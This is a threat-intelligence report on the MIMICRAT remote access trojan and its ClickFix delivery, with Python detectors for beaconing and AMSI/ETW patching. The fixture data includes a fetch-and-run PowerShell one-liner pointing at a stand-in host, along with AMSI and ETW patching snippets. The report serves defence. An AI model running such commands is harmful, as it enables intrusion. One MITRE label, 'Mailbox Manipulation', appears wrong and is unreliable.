# Full Report
Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (aka AstarionRAT). "The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage
# Analysis Summary
# Tool/Technique: MIMICRAT (aka AstarionRAT)
## Overview
MIMICRAT is a previously undocumented, sophisticated C++ remote access trojan (RAT) used in "ClickFix" social engineering campaigns. The malware is built for post-exploitation activity, including data exfiltration and providing a foothold for possible ransomware deployment. It stands out for its Lua-scripted loaders and for C2 traffic that mimics legitimate web analytics.
## Technical Details
- **Type**: Malware family (Remote Access Trojan)
- **Platform**: Windows
- **Capabilities**: Token impersonation, SOCKS5 tunneling, process/file manipulation, and credential theft.
- **First Seen**: February 2026
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1189 - Drive-by Compromise] (Compromised legitimate sites)
- **[TA0002 - Execution]**
  - [T1059.001 - PowerShell] (Multi-stage PowerShell chain)
  - [T1204.001 - User Execution: Malicious Link] (ClickFix lure)
- **[TA0005 - Defense Evasion]**
  - [T1562.001 - Impair Defenses: Disable or Modify Tools] (ETW and AMSI patching)
  - [T1140 - Deobfuscate/Decode Files or Information] (Lua script decrypting shellcode)
  - [T1027.011 - Obfuscated Files or Information: Mailbox Manipulation] (Lure localization)
- **[TA0004 - Privilege Escalation]**
  - [T1134 - Access Token Manipulation] (Windows token impersonation)
- **[TA0011 - Command and Control]**
  - [T1071.001 - Application Layer Protocol: Web Protocols] (HTTPS Port 443)
  - [T1090.003 - Proxy: Multi-hop Proxy] (SOCKS5 tunneling)
## Functionality
### Core Capabilities
- **Comprehensive Command Set**: Supports 22 separate commands for full system control.
- **File & Process Management**: Allows attackers to view, modify, and terminate processes or files.
- **Interactive Shell**: Provides remote command-line access to the infected host.
- **Network Tunneling**: Integrated SOCKS5 proxy support to tunnel traffic through the victim's network.
### Advanced Features
- **Sophisticated Loader**: Uses a Lua-scripted engine to decrypt and execute shellcode in memory, minimizing the on-disk footprint.
- **Evasion Suite**: Actively patches Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI) via PowerShell before the main payload is deployed.
- **C2 Camouflage**: Uses HTTP profiles that mimic legitimate web analytics traffic to blend in with standard enterprise network noise.
- **Dynamic Localization**: The ClickFix lure supports 17 languages, automatically adjusting based on the victim’s browser settings.
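The C2 camouflage described above is a blending problem rather than a signature problem: requests shaped like analytics hits will not stand out by URI alone. The Python below, added here as an illustration and not code from the report or from Elastic Security Labs, shows one way a defender can still surface such traffic from proxy logs: genuine analytics requests arrive in bursts tied to browsing, whereas an implant checking in arrives on a timer. The log lines, the destination `cdn.example.invalid`, the request paths and the 60-second cadence are all constructed for the example; the report states no beacon interval.

```python
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed proxy log lines (not captures from the campaign). Fields: epoch
# seconds, source host, destination host, request path. The analytics-looking
# paths stand in for a camouflaged C2 profile; the 60-second cadence of ws01 is
# an assumption made for the example. ws02 shows what browsing-driven analytics
# traffic looks like: a burst of hits when a page loads, then silence.
SAMPLE_PROXY_LOG = """\
1700000000 ws01 cdn.example.invalid /collect?v=1&t=pageview&cid=5a1
1700000061 ws01 cdn.example.invalid /collect?v=1&t=event&cid=5a1
1700000119 ws01 cdn.example.invalid /collect?v=1&t=event&cid=5a1
1700000181 ws01 cdn.example.invalid /collect?v=1&t=pageview&cid=5a1
1700000240 ws01 cdn.example.invalid /collect?v=1&t=event&cid=5a1
1700000299 ws01 cdn.example.invalid /collect?v=1&t=event&cid=5a1
1700000360 ws01 cdn.example.invalid /collect?v=1&t=pageview&cid=5a1
1700000421 ws01 cdn.example.invalid /collect?v=1&t=event&cid=5a1
1700000000 ws02 cdn.example.invalid /collect?v=1&t=pageview&cid=9f2
1700000003 ws02 cdn.example.invalid /collect?v=1&t=event&cid=9f2
1700000004 ws02 cdn.example.invalid /collect?v=1&t=event&cid=9f2
1700000130 ws02 cdn.example.invalid /collect?v=1&t=pageview&cid=9f2
1700000131 ws02 cdn.example.invalid /collect?v=1&t=event&cid=9f2
1700000400 ws02 cdn.example.invalid /collect?v=1&t=pageview&cid=9f2
1700000401 ws02 cdn.example.invalid /collect?v=1&t=event&cid=9f2
1700000402 ws02 cdn.example.invalid /collect?v=1&t=event&cid=9f2
1700000010 ws03 www.example.invalid /index.html
1700000700 ws03 www.example.invalid /news.html
"""

Record = Tuple[int, str, str, str]


def parse_log(text: str) -> List[Record]:
    """Parse the four-field log format above into (timestamp, src, dst, path)."""
    records: List[Record] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, path = line.split(maxsplit=3)
        records.append((int(ts), src, dst, path))
    return records


def find_beacons(records: List[Record], min_requests: int = 6,
                 max_cv: float = 0.1) -> List[Dict[str, object]]:
    """Flag (src, dst) pairs whose request timing is too regular for a human.

    Regularity is the coefficient of variation (stdev / mean) of the gaps
    between consecutive requests. A timer-driven implant keeps a small CV even
    with some jitter; browsing-driven traffic has a large one.
    """
    by_pair: Dict[Tuple[str, str], List[int]] = defaultdict(list)
    for ts, src, dst, _path in records:
        by_pair[(src, dst)].append(ts)
    hits: List[Dict[str, object]] = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < min_requests:
            continue  # too few samples to judge cadence
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue  # all requests in the same second: a burst, not a beacon
        cv = statistics.stdev(gaps) / mean
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "count": len(stamps),
                         "mean_interval": round(mean, 1), "cv": round(cv, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_PROXY_LOG)):
        print(f"{hit['src']} -> {hit['dst']}: {hit['count']} requests, "
              f"every ~{hit['mean_interval']}s (cv={hit['cv']})")
```

The thresholds (`min_requests`, `max_cv`) are the tuning knobs: a lower `max_cv` reduces false positives from polling applications, while a longer observation window raises `count` for slow check-in intervals. Pair the output with the destination's reputation and age before escalating, since legitimate software updaters also poll on a timer.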
## Indicators of Compromise
- **File Hashes**: *Not provided in the source text; refer to Elastic Security Labs report.*
- **File Names**: Lua-based loader scripts, Matanbuchus 3.0 loader components.
- **Network Indicators**:
  - bincheck[.]io (Compromised delivery site)
  - C2 communication over HTTPS Port 443 (Mimicking analytics traffic)
- **Behavioral Indicators**:
  - PowerShell execution via Windows "Run" dialog (Win+R).
  - Unauthorized modifications to AMSI and ETW memory structures.
  - Unexpected Lua interpreter activity on Windows endpoints.
## Associated Threat Actors
- **Unknown**: While specific attribution is not finalized, researchers note tactical and infrastructure overlaps with campaigns delivering the **Matanbuchus 3.0** loader.
## Detection Methods
- **Signature-based detection**: Scanning for the unique Lua-based loader and the C++-based MIMICRAT binary.
- **Behavioral detection**:
  - Monitoring for PowerShell scripts that attempt to patch `amsi.dll` or `ntdll.dll` (ETW).
  - Identifying "ClickFix" patterns: users copying/pasting complex commands into the "Run" dialog from a web browser.
  - Detecting unusual process hollowing or shellcode injection initiated by a Lua interpreter.
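As an added example (not code from the report or from Elastic Security Labs), the Python below applies the three behavioral detections listed above to a handful of constructed SIEM events: PowerShell ScriptBlock text that names AMSI or ETW internals together with a memory-write API, a launcher started by explorer.exe (the parent of anything typed into the Run dialog) with one-liner flags, and a stand-alone Lua interpreter. The event records, host names and indicator regexes are assumptions made for the example; tune them to your own telemetry.

```python
import re
from typing import Dict, List

# Constructed sample events (not real telemetry from the campaign). Each record
# stands in for a normalised SIEM event: a PowerShell ScriptBlock log entry
# (Event ID 4104) or a process-creation event with parent, image and command line.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # ScriptBlock text naming an AMSI export together with a memory-protection API
    {"type": "scriptblock", "host": "ws01",
     "text": "$h = LoadLibrary('amsi.dll'); $p = GetProcAddress($h, 'AmsiScanBuffer'); "
             "VirtualProtect($p, 8, 0x40, [ref]$old)"},
    # ScriptBlock text touching the ETW write routine exported by ntdll.dll
    {"type": "scriptblock", "host": "ws01",
     "text": "$e = GetProcAddress((LoadLibrary 'ntdll.dll'), 'EtwEventWrite'); "
             "WriteProcessMemory(-1, $e, $patch, $patch.Length, [ref]0)"},
    # PowerShell spawned by explorer.exe, which is how Run-dialog (Win+R) children appear
    {"type": "process", "host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iwr https://example.invalid/p | iex"'},
    # A stand-alone Lua interpreter on a workstation that has no reason to run one
    {"type": "process", "host": "ws02", "parent": "powershell.exe", "image": "lua54.exe",
     "cmdline": "lua54.exe stage2.lua"},
    # Benign noise that the rules must not flag
    {"type": "scriptblock", "host": "ws03", "text": "Get-ChildItem C:\\Temp | Measure-Object"},
    {"type": "process", "host": "ws03", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

# Indicator patterns (assumed for the example, not taken from the report).
# A script that patches AMSI or ETW has to name the target symbol ...
AMSI_ETW = re.compile(
    r"amsi\.dll|AmsiScanBuffer|amsiInitFailed|AmsiUtils|EtwEventWrite|NtTraceEvent", re.I)
# ... and needs a way to write into that memory.
MEMWRITE = re.compile(r"VirtualProtect|WriteProcessMemory|Marshal\]::Copy", re.I)
# Flags and cmdlets typical of a pasted one-liner rather than a scheduled script.
ONE_LINER = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b|-ep\s+bypass|\biex\b|\biwr\b"
    r"|Invoke-Expression|Invoke-WebRequest", re.I)
LAUNCHERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
LUA_IMAGE = re.compile(r"^lua(?:jit)?[\d.]*\.exe$", re.I)


def evaluate(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Return zero or more findings for a single normalised event."""
    findings: List[Dict[str, str]] = []
    host = event["host"]
    if event["type"] == "scriptblock":
        text = event["text"]
        if AMSI_ETW.search(text):
            # Naming the symbol alone is medium (security tooling does it too);
            # symbol plus memory write is the patching behaviour described above.
            severity = "high" if MEMWRITE.search(text) else "medium"
            findings.append({"host": host, "rule": "amsi_etw_patch", "severity": severity})
    elif event["type"] == "process":
        image = event["image"].lower()
        parent = event["parent"].lower()
        if image in LAUNCHERS and parent == "explorer.exe" and ONE_LINER.search(event["cmdline"]):
            findings.append({"host": host, "rule": "clickfix_run_dialog", "severity": "high"})
        if LUA_IMAGE.match(image) or LUA_IMAGE.match(parent):
            findings.append({"host": host, "rule": "lua_interpreter", "severity": "medium"})
    return findings


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every rule over every event and collect the findings."""
    return [finding for event in events for finding in evaluate(event)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding['host']:5} {finding['severity']:6} {finding['rule']}")
```

The explorer.exe parent check is what separates a Run-dialog paste from a PowerShell job launched by a scheduler or a management agent; the Lua rule is deliberately broad because the page describes the interpreter itself as unexpected on Windows endpoints, so an allow-list of hosts that legitimately run Lua is the usual tuning step.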
## Mitigation Strategies
- **User Training**: Educate users never to copy and paste commands from websites into the Windows Run dialog or PowerShell.
- **Attack Surface Reduction**: Use Browser Isolation or restrict the execution of PowerShell for non-administrative users.
- **Endpoint Hardening**: Enable Constrained Language Mode in PowerShell and deploy robust Endpoint Detection and Response (EDR) tools to monitor for memory-only threats.
- **Web Filtering**: Block known malicious domains and implement inspection for encrypted HTTPS traffic.
## Related Tools/Techniques
- **ClickFix**: The social engineering framework used for initial delivery.
- **Matanbuchus 3.0**: A loader often seen in similar infrastructure setups.
- **AstarionRAT**: An alternative name for the MIMICRAT family.